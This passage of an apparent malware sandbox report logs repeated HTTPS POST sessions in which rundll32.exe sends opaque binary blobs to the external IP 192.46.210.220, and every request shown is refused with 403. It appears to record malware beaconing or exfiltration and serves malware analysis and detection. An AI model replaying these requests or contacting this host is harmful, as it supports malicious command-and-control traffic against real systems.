                                                                                                      2021-10-28 03:08:32 UTC229OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:32 UTC239INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:32 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      47192.168.2.450004192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:32 UTC234OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:32 UTC234OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:33 UTC239INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:33 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      48192.168.2.450023192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:36 UTC239OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:36 UTC239OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:36 UTC249INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:36 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      49192.168.2.450024192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:36 UTC244OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:36 UTC244OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:36 UTC249INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:36 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      5192.168.2.449802192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:10 UTC24OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:07:10 UTC24OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:07:11 UTC29INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:07:11 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      50192.168.2.450034192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:39 UTC249OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:39 UTC249OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:40 UTC259INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:40 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      51192.168.2.450035192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:40 UTC254OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:40 UTC254OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:40 UTC259INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:40 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      52192.168.2.450042192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:43 UTC259OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:43 UTC259OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:44 UTC269INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:44 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      53192.168.2.450043192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:43 UTC264OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:43 UTC264OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:44 UTC269INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:44 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      54192.168.2.450050192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:47 UTC269OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:47 UTC269OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:48 UTC279INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:48 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      55192.168.2.450051192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:47 UTC274OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:47 UTC274OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:48 UTC279INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:48 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      56192.168.2.450058192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:51 UTC279OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:51 UTC279OUTData Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:52 UTC289INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:52 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      57192.168.2.450059192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:51 UTC284OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:51 UTC284OUTData Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:08:52 UTC289INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:52 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      58192.168.2.450072192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:08:55 UTC289OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
